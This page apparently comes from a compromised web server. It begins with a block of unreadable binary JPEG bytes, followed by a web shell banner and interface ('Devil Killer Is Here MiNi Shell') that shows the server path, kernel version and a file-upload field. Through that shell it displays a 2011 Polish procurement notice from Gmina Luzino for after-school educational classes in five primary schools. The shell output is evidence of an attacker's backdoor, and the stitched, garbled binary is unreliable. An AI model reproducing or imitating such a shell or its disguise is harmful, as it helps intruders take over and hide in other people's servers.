JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111019/342884-N-2011.html

<p class="kh_header"><b>Luzino: ZAKUP USŁUG EDUKACYJNYCH W RAMACH PROJEKTU SYSTEMOWEGO  PT. DOBRY START - WYRÓWNYWANIE SZANS EDUKACYJNO-ROZWOJOWYCH DZIECI KLAS I-III SZKÓŁ PODSTAWOWYCH GMINY LUZINO</b><br>
<b>Numer ogłoszenia: 342884 - 2011; data zamieszczenia: 19.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Luzino , ul. Ofiar Stutthofu 11, 84-242 Luzino, woj. pomorskie, tel. 058 6782068 w. 49, faks 058 6782325.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.luzino.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP USŁUG EDUKACYJNYCH W RAMACH PROJEKTU SYSTEMOWEGO  PT. DOBRY START - WYRÓWNYWANIE SZANS EDUKACYJNO-ROZWOJOWYCH DZIECI KLAS I-III SZKÓŁ PODSTAWOWYCH GMINY LUZINO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług edukacyjnych polegających na przeprowadzeniu zajęć pozalekcyjnych w roku szkolnym 2011/2012 ( listopad 2011 - czerwiec 2012), w 5 szkołach podstawowych na terenie Gminy Luzino w następujących miejscowościach: Luzino, Kębłowo, Sychowo, Wyszecino, Barłomino. Zamówienie realizowane jest w ramach projektu systemowego pn. Dobry start - wyrównanie szans edukacyjno-rozwojowych dzieci klas I-III szkół podstawowych Gminy Luzino współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytetu IX Programu operacyjnego Kapitał Ludzki: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1, Poddziałanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.
3.3.  Zakres usług obejmuje w szczególności: świadczenie usług edukacyjnych polegających na przeprowadzeniu zajęć pozalekcyjnych w roku szkolnym 2011/2012 ( listopad 2011 - czerwiec 2012), w 5 szkołach podstawowych na terenie Gminy Luzino w następujących jednostkach ( miejsce wykonania usług edukacyjnych) : 



3.3.1 Szkoła Podstawowa im. Lecha Bądkowskiego w Luzinie, ul. Szkolna 13, 84-242 Luzino.

Lp.	Rodzaj zajęć	Ilość grup/
Liczba dzieci w grupie	Łączna liczba dzieci objętych projektem	Łączna liczba godzin
1.	1.		Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji	12/po 3 lub 4 	40	360
2.	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych 	16/ do 7 	110	720
3.	Gimnastyka korekcyjna dla dzieci z wadami postawy	8/ do 7	50	240
4.	Zajęcia rozwijające zainteresowania matematyczno-przyrodnicze uczniów szczególnie uzdolnionych 	3/ do 9	25	150
5.	Zajęcia logopedyczne	10/do 4	40	300
6.	Zajęcia rozwijające uczniów szczególnie uzdolnionych z j. polskiego	3/ do 9	25	150
7.	Zajęcia rozwijające uczniów szczególnie uzdolnionych z j. angielskiego	3/ do 9	25	150
Razem	-	315	2070


3.3.2. Szkoła Podstawowa im. Jana Pawła II w Kębłowie, ul. Wiejska 49, 84-242 Luzino
Lp.	Rodzaj zajęć	Ilość grup/
Liczba dzieci w grupie	Łączna liczba dzieci objętych projektem	Łączna liczba godzin
2.	1	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji	6/ do 6	30	360
2.	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych 	6/ do 5	30	360
3.	Gimnastyka korekcyjna dla dzieci z wadami postawy	2/ do 7	14	120
4.	Zajęcia rozwijające zainteresowania matematyczno-przyrodnicze uczniów szczególnie uzdolnionych 	3/do 6	18	180
5.	Zajęcia logopedyczne	2/ do 3	6	120
Razem	-	98	1140

3.3.3. Szkoła Podstawowa im. Płk. Stanisława Dąbka w Sychowie, ul. Szkolna 4, 84-242 Luzino


Lp.	Rodzaj zajęć	Ilość grup/
Liczba dzieci w grupie	Łączna liczba dzieci objętych projektem	Łączna liczba godzin
3.	1.		Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji		30	150
2.	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych 	3/do 10	30	150
3.	Gimnastyka korekcyjna dla dzieci z wadami postawy	3/ do 10	30	120
4.	Zajęcia rozwijające zainteresowania matematyczno-przyrodnicze uczniów szczególnie uzdolnionych 	1/ do 10	10	60
5.	Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy	4/ do 2	8	180
6.	Zajęcia rozwijające szczególne zainteresowania uczniów /teatralne/	1/do 10	10	60
7.	Zajęcia terapii pedagogicznej /korekcyjno-kompensacyjne/	1/do 5	5	60
Razem	-	123	780

3.3.4. Szkoła Podstawowa w Wyszecinie, ul. Szkolna 2, 84-242 Luzino


Lp.	Rodzaj zajęć	Ilość grup/
Liczba dzieci w grupie	Łączna liczba dzieci objętych projektem	Łączna liczba godzin
4.	1.	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji	2/ do 5	9	120
2.	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych 	1/do 4	4	60
3.	Gimnastyka korekcyjna dla dzieci z wadami postawy	1/ do 4	4	60
4.	Zajęcia rozwijające zainteresowania matematyczno-przyrodnicze uczniów szczególnie uzdolnionych 	1/do 8	8	60
5.	Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy	2/do 4	8	120
Razem	-	33	420

3.3.5. Szkoła Podstawowa im. Ks. Jana Twardowskiego w Barłominie, ul. Szkolna 3, 84-242 Luzino

Lp.	Rodzaj zajęć	Ilość grup/
Liczba dzieci w grupie	Łączna liczba dzieci objętych projektem	Łączna liczba godzin
1.	1.	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji	3/ do 5 	15	180
2.	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych 	1/ do 6	6	60
3.	Zajęcia muzyczno-ruchowe	1/ do 17	17	60
Razem	-	38	300

3.4. Zakres przedmiotu zamówienia (obowiązki Wykonawcy ) obejmuje w szczególności:
1)	przygotowanie harmonogramu realizacji zajęć zgodnie z niniejszą specyfikacją,  dostosowanie do ustalonego w danej szkole planu lekcji oraz uzgodnienie harmonogramu z dyrektorem danej placówki w terminie do dnia podpisania umowy. W przypadku zmiany planu lekcji, harmonogram będzie musiał uwzględniać aktualny rozkład zajęć. Dyrektor danej szkoły,  w której odbywać się będą zajęcia, musi być bezzwłocznie  poinformowany o wszelkich zmianach w harmonogramie,
2)	opracowanie tematyki zajęć oraz celów zajęć zgodnie z celem ogólnym oraz celami szczegółowymi założonymi we wniosku aplikacyjnym w terminie do dnia podpisania umowy, przy szczególnym uwzględnieniu potrzeb i umiejętności uczniów; scenariusze zajęć powinny uwzględniać szacunek i otwartość na inność wśród dzieci oraz zapewniać przestrzeganie zasady równości płci,
3)	rzetelnej realizacji godzin zajęć w ramach projektu zgodnie z ustalonym harmonogramem realizacji zajęć, zatwierdzonym przez Koordynatora projektu,
4)	zapewnienie opieki nad uczniami podczas zajęć,
5)	dbania o stan pomieszczeń, sprzętu i urządzeń wykorzystywanych w trakcie realizacji projektu,
6)	współdziałanie z Dyrektorami szkół, w których odbywają się zajęcia, w zakresie wszelkich spraw związanych z ich prowadzeniem,
7)	przestrzegania obowiązujących przepisów prawa oświatowego i statutów szkół,
8)	terminowego sporządzania dokumentacji:
A)	Dziennik zajęć - uzupełniany na bieżąco
B)	Karty oceny opisowej ucznia - uzupełniane na bieżąco, odrębnie dla każdego ucznia, po zakończeniu miesiąca kalendarzowego zajęć,
C)	Listy obecności - Wykonawca jest odpowiedzialny za zgodność listy obecności podpisanej przez uczestników projektu z ilością dzieci obecnych na zajęciach wykazaną w dzienniku zajęć,
D)	Sporządzania sprawozdań i innych dokumentów zleconych przez Koordynatora projektu, w tym diagnozy przyrostu wiedzy uczniów i dokonywania ewaluacji prowadzonych zajęć odniesieniu do założonych kryteriów w projekcie i przedstawiania tych informacji raz na kwartał,
E)	Przeprowadzenie testu diagnozującego oraz testu sprawdzającego nabyte umiejętności,
9)	Sporządzanie miesięcznych kart czasu pracy,
10)	Wykonywanie innych zadań wynikających z przepisów prawa. 
3.5. Zamówienie zostało podzielone przez zamawiającego na następujące części: 
3.5.1. Szkoła Podstawowa w Luzinie
Część nr 1 pn. Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 2 pn. Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 3 pn. Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 4 pn. Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 5 pn. Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 6 pn. Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 7 pn. Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 8 pn. Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 9 pn. Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 10 pn. Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 11 pn. Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 12 pn. Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 13 pn. Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Luzinie - 45  godzin,
Część nr 14 pn. Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Luzinie - 45  godzin,
Część nr 15 pn. Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Luzinie - 45  godzin,
Część nr 16 pn. Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Luzinie - 45  godzin,
Część nr 17 pn. Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Luzinie - 45  godzin,
Część nr 18 pn. Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Luzinie - 45  godzin,
Część nr 19 pn. Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Luzinie - 45  godzin,
Część nr 20 pn. Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Luzinie - 45  godzin,
Część nr 21 pn. Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Luzinie - 45  godzin,
Część nr 22 pn. Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Luzinie - 45  godzin,
Część nr 23 pn. Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Luzinie - 45  godzin,
Część nr 24 pn. Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Luzinie - 45  godzin,
Część nr 25 pn. Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Luzinie - 45  godzin,
Część nr 26 pn. Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Luzinie - 45  godzin,
Część nr 27 pn. Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Luzinie - 45  godzin,
Część nr 28 pn. Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, prowadzone w Szkole Podstawowej w Luzinie - 45  godzin,
Część nr 29 pn. Zajęcia  gimnastyki korekcyjnej dla dzieci z wadami postawy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 30 pn. Zajęcia  gimnastyki korekcyjnej dla dzieci z wadami postawy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 31 pn. Zajęcia  gimnastyki korekcyjnej dla dzieci z wadami postawy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 32 pn. Zajęcia  gimnastyki korekcyjnej dla dzieci z wadami postawy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 33 pn. Zajęcia  gimnastyki korekcyjnej dla dzieci z wadami postawy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 34 pn. Zajęcia  gimnastyki korekcyjnej dla dzieci z wadami postawy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 35 pn. Zajęcia  gimnastyki korekcyjnej dla dzieci z wadami postawy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 36 pn. Zajęcia  gimnastyki korekcyjnej dla dzieci z wadami postawy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 37 pn. Zajęcia  logopedyczne dla dzieci z zaburzeniami rozwoju mowy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 38 pn. Zajęcia  logopedyczne dla dzieci z zaburzeniami rozwoju mowy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 39 pn. Zajęcia  logopedyczne dla dzieci z zaburzeniami rozwoju mowy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 40 pn. Zajęcia  logopedyczne dla dzieci z zaburzeniami rozwoju mowy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 41 pn. Zajęcia  logopedyczne dla dzieci z zaburzeniami rozwoju mowy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 42 pn. Zajęcia  logopedyczne dla dzieci z zaburzeniami rozwoju mowy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 43 pn. Zajęcia  logopedyczne dla dzieci z zaburzeniami rozwoju mowy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 44 pn. Zajęcia  logopedyczne dla dzieci z zaburzeniami rozwoju mowy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 45 pn. Zajęcia  logopedyczne dla dzieci z zaburzeniami rozwoju mowy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 46 pn. Zajęcia  logopedyczne dla dzieci z zaburzeniami rozwoju mowy, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin,
Część nr 47 pn. Zajęcia  rozwijające zainteresowania uczniów wybitnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych, prowadzone w Szkole Podstawowej w Luzinie - 60  godzin,
Część nr 48 pn. Zajęcia  rozwijające zainteresowania uczniów wybitnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin, 
Część nr 49 pn. Zajęcia  rozwijające zainteresowania uczniów wybitnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych, prowadzone w Szkole Podstawowej w Luzinie - 60  godzin,
Część nr 50 pn. Zajęcia  rozwijające zainteresowania uczniów wybitnie uzdolnionych z j. polskiego, prowadzone w Szkole Podstawowej w Luzinie - 60  godzin ,
Część nr 51 pn. Zajęcia  rozwijające zainteresowania uczniów wybitnie uzdolnionych z j. polskiego, prowadzone w Szkole Podstawowej w Luzinie - 60  godzin ,
Część nr 52 pn. Zajęcia  rozwijające zainteresowania uczniów wybitnie uzdolnionych z j. polskiego, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin ,
Część nr 53 pn. Zajęcia  rozwijające zainteresowania uczniów wybitnie uzdolnionych 
z j. angielskiego, prowadzone w Szkole Podstawowej w Luzinie - 30  godzin ,
Część nr 54 pn. Zajęcia  rozwijające zainteresowania uczniów wybitnie uzdolnionych 
z j. angielskiego, prowadzone w Szkole Podstawowej w Luzinie - 60  godzin ,
Część nr 55 pn. Zajęcia  rozwijające zainteresowania uczniów wybitnie uzdolnionych 
z j. angielskiego, prowadzone w Szkole Podstawowej w Luzinie - 60  godzin ,
3.5.2. Szkoła Podstawowa w Kębłowie
Część nr 56 Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji , prowadzone w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 57 Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji , prowadzone w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 58 Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji , prowadzone w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 59 Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji , prowadzone w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 60 Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji , prowadzone w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 61 Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji , prowadzone w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 62 Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych , prowadzone w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 63 Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych , prowadzone w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 64 Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych , prowadzone w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 65 Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych , prowadzone w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 66 Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych , prowadzone w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 67 Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych , prowadzone w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 68 Gimnastyka korekcyjna dla dzieci z wadami postawy, prowadzona w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 69 Gimnastyka korekcyjna dla dzieci z wadami postawy, prowadzona w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 70 Zajęcia  rozwijające zainteresowania matematyczno-przyrodnicze uczniów szczególnie uzdolnionych , prowadzone w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 71 Zajęcia  rozwijające zainteresowania matematyczno-przyrodnicze uczniów szczególnie uzdolnionych , prowadzone w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 72 Zajęcia  rozwijające zainteresowania matematyczno-przyrodnicze uczniów szczególnie uzdolnionych , prowadzone w Szkole Podstawowej w Kębłowie - 60 godzin,
Część nr 73 Zajęcia  logopedyczne , prowadzone w Szkole Podstawowej w Kębłowie -  60 godzin,
Część nr 74 Zajęcia  logopedyczne , prowadzone w Szkole Podstawowej w Kębłowie -  60 godzin,
3.5.3. Szkoła Podstawowa w Sychowie
Część nr 75 Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji , prowadzone w Szkole Podstawowej w Sychowie - 50 godzin,
Część nr 76 Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji , prowadzone w Szkole Podstawowej w Sychowie - 50 godzin,
Część nr 77 Zajęcia  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji , prowadzone w Szkole Podstawowej w Sychowie - 50 godzin,
Część nr 78 Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych , prowadzone w Szkole Podstawowej w Sychowie - 50 godzin, 
Część nr 79 Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych , prowadzone w Szkole Podstawowej w Sychowie - 50 godzin, 
Część nr 80 Zajęcia  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych , prowadzone w Szkole Podstawowej w Sychowie - 50 godzin, 
Część nr 81 Gimnastyka korekcyjna dla dzieci z wadami postawy , prowadzone w Szkole Podstawowej w Sychowie - 30 godzin, 
Część nr 82 Gimnastyka korekcyjna dla dzieci z wadami postawy , prowadzone w Szkole Podstawowej w Sychowie - 30 godzin, 
Część nr 83 Gimnastyka korekcyjna dla dzieci z wadami postawy , prowadzone w Szkole Podstawowej w Sychowie - 30 godzin, 
Część nr 84 Gimnastyka korekcyjna dla dzieci z wadami postawy , prowadzone w Szkole Podstawowej w Sychowie - 30 godzin, 
Część nr 85 Zajęcia  rozwijające zainteresowania matematyczno-przyrodnicze uczniów szczególnie uzdolnionych , prowadzone w Szkole Podstawowej w Sychowie - 60 godzin,
Część nr 86 Zajęcia  logopedyczne , prowadzone w Szkole Podstawowej w Sychowie -  60 godzin,
Część nr 87 Zajęcia  logopedyczne , prowadzone w Szkole Podstawowej w Sychowie -  60 godzin,
Część nr 88 Zajęcia  logopedyczne , prowadzone w Szkole Podstawowej w Sychowie -  30 godzin,
